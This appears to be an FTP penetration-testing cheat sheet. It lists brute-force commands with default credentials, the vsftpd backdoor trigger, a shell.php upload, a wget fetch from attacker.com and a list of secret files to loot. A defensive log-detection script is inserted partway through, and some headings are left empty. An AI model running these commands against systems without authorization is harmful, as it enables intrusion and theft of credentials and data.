FTP penetration testing guide covering anonymous login testing, brute force attacks, banner grabbing, and file transfer exploitation using tools like Nmap, Hydra, and Netcat for security assessments and ethical hacking.
FTP (File Transfer Protocol) runs on port 21 and is commonly used for file transfers. FTP servers often contain misconfigurations, default credentials, or vulnerabilities that can lead to unauthorized access and data exposure.
Netcat:
nc $RHOST 21
echo "QUIT" | nc $RHOST 21
Telnet:
telnet $RHOST 21
Banner extraction:
timeout 3 nc $RHOST 21 2>/dev/null
Nmap service scan:
nmap -sV -p 21 $RHOST
nmap -sC -sV -p 21 $RHOST
Default safe scripts:
nmap --script "ftp-* and safe" -p 21 $RHOST
All FTP scripts:
nmap --script "ftp-*" -p 21 $RHOST
Common enumeration scripts:
nmap --script ftp-anon,ftp-bounce,ftp-syst -p 21 $RHOST
Vulnerability detection:
nmap --script "ftp-vuln-*" -p 21 $RHOST
Many FTP servers allow anonymous access with the username anonymous or ftp and any password (often anonymous@, an empty string, or an email address).
ftp $RHOST
# Username: anonymous
# Password: anonymous@ (or empty)
Nmap:
nmap --script ftp-anon -p 21 $RHOST
Metasploit:
msfconsole
use auxiliary/scanner/ftp/anonymous
set RHOSTS $RHOST
run
Once connected with anonymous access:
# List files
ls -la
# Download file
get filename.txt
# Upload file (if allowed)
put test.txt
# Change directory
cd /pub
# Check current directory
pwd
# Check system info
syst
Common default FTP credentials to test:
Common combinations:
admin:admin
administrator:password
ftp:ftp
user:user
root:root
guest:guest
test:test
Vendor-specific defaults:
ftp:ftp (if anonymous enabled)
ftp:ftp
Hydra:
hydra -L users.txt -P passwords.txt ftp://$RHOST
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$RHOST
Ncrack:
ncrack -p 21 -U users.txt -P passwords.txt $RHOST
Medusa:
medusa -h $RHOST -u admin -P passwords.txt -M ftp
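Defender-side view of the Hydra, Ncrack and Medusa runs above, as an added example that is not part of the original guide: it flags source IPs that exceed a failed-login threshold inside a time window and reports any successful login that follows from the same IP. The log lines are constructed in the style of vsftpd's log file; the line format, threshold and window are assumptions to adjust for the server in use.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in vsftpd log style (not from a real server).
SAMPLE_LOG = """\
Mon Mar 11 10:00:01 2024 [pid 4101] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar 11 10:00:03 2024 [pid 4102] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar 11 10:00:05 2024 [pid 4103] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar 11 10:00:06 2024 [pid 4104] [alice] FAIL LOGIN: Client "198.51.100.20"
Mon Mar 11 10:00:07 2024 [pid 4105] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar 11 10:00:09 2024 [pid 4106] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar 11 10:00:15 2024 [pid 4107] [alice] OK LOGIN: Client "198.51.100.20"
Mon Mar 11 10:00:20 2024 [pid 4108] [admin] OK LOGIN: Client "203.0.113.7"
"""

# Assumed line layout: timestamp, [pid N], [user], OK|FAIL LOGIN, Client "ip"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(log_text, max_failures=5, window_s=60):
    """Return (flagged_ips, logins_after_bruteforce).

    An IP is flagged once it has max_failures failed logins within
    window_s seconds; any later OK LOGIN from a flagged IP is reported
    as an (ip, user) pair, since it suggests a guessed password.
    """
    recent = defaultdict(deque)      # ip -> timestamps of recent failures
    flagged, suspicious_logins = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # skip transfer records and other lines
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip = m["ip"]
        if m["result"] == "FAIL":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()          # drop failures outside the window
            if len(q) >= max_failures:
                flagged.add(ip)
        elif ip in flagged:
            suspicious_logins.append((ip, m["user"]))
    return sorted(flagged), suspicious_logins
```
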
# Interactive mode
ftp $RHOST
# Command line mode
ftp -n $RHOST << EOF
user username password
binary
get file.txt
quit
EOF
# Passive mode (for firewall traversal)
passive
# Active vs Passive mode
passive on # Passive mode (default in most clients)
passive off # Active mode
# File transfer type
ascii # Text files
binary # Binary files (images, executables)
# Directory operations
ls -la # List files
cd /path # Change directory
pwd # Print working directory
mkdir dirname # Create directory
rmdir dirname # Remove directory
# File operations
get filename # Download file
mget *.txt # Download multiple files
put filename # Upload file
mput *.txt # Upload multiple files
delete filename # Delete file
mdelete *.txt # Delete multiple files
rename old new # Rename file
# System information
syst # System type
stat # Server status
help # List commands
Exploit FTP servers that allow connections to arbitrary hosts (rare in modern servers).
# Test for bounce capability
ftp $RHOST
# After login:
quote PORT 127,0,0,1,0,80
quote LIST
Nmap bounce scan:
nmap -b $RHOST -p 21,80
Note: Modern FTP servers typically disable bounce attacks by default. This vulnerability is rare.
Some FTP servers reveal whether usernames exist through different error messages.
# Try invalid password with real username
ftp $RHOST
Username: admin
Password: invalidpass
Compare error messages:
Test for directory traversal vulnerabilities:
ftp $RHOST
cd ../../../
pwd
ls -la
Test SSL/TLS configuration:
openssl s_client -connect $RHOST:21 -starttls ftp
nmap --script "ssl-*" -p 21 $RHOST
Using ftp client:
ftp $RHOST
binary
get config.txt
mget *.conf
Using wget:
wget ftp://user:pass@$RHOST/file.txt
wget --ftp-user=user --ftp-password=pass ftp://$RHOST/file.txt
wget -r ftp://user:pass@$RHOST/
Using curl:
curl ftp://user:pass@$RHOST/file.txt -o output.txt
curl ftp://user:pass@$RHOST/ -l
Using ftp client:
ftp $RHOST
binary
put shell.php
put /path/to/local/file.txt remote/file.txt
Using curl:
curl -T file.txt ftp://user:pass@$RHOST/
curl -T file.txt ftp://user:pass@$RHOST/uploads/file.txt
Download entire directory:
wget -r ftp://user:pass@$RHOST/path/
Mirror directory:
wget -m ftp://user:pass@$RHOST/
FTP uses two modes for data connections:
Test passive mode:
ftp $RHOST
passive
ls
Test active mode:
ftp $RHOST
passive off
ls
Version detection:
nmap -sV -p 21 $RHOST | grep vsftpd
Known vulnerabilities:
Check for backdoor:
echo 'USER test:)'
echo 'PASS test'
# Then check for a shell listening on port 6200
nc $RHOST 6200
Version detection:
nmap -sV -p 21 $RHOST | grep -i proftpd
Mod_copy vulnerability (CVE-2015-3306):
# Test for mod_copy module
# Allows copying files without proper authorization
Version detection:
nmap -sV -p 21 $RHOST | grep FileZilla
Via wget from target:
# If you have web shell or RCE
wget --ftp-user=user --ftp-password=pass ftp://attacker.com/file.txt
Common files to look for:
config.php, .env, web.config
*.bak, *.backup, *.old
access.log, error.log
*.db, *.sql
id_rsa, id_dsa
ftp $RHOST
# Search for common files
mget *.conf
mget *.bak
mget *.log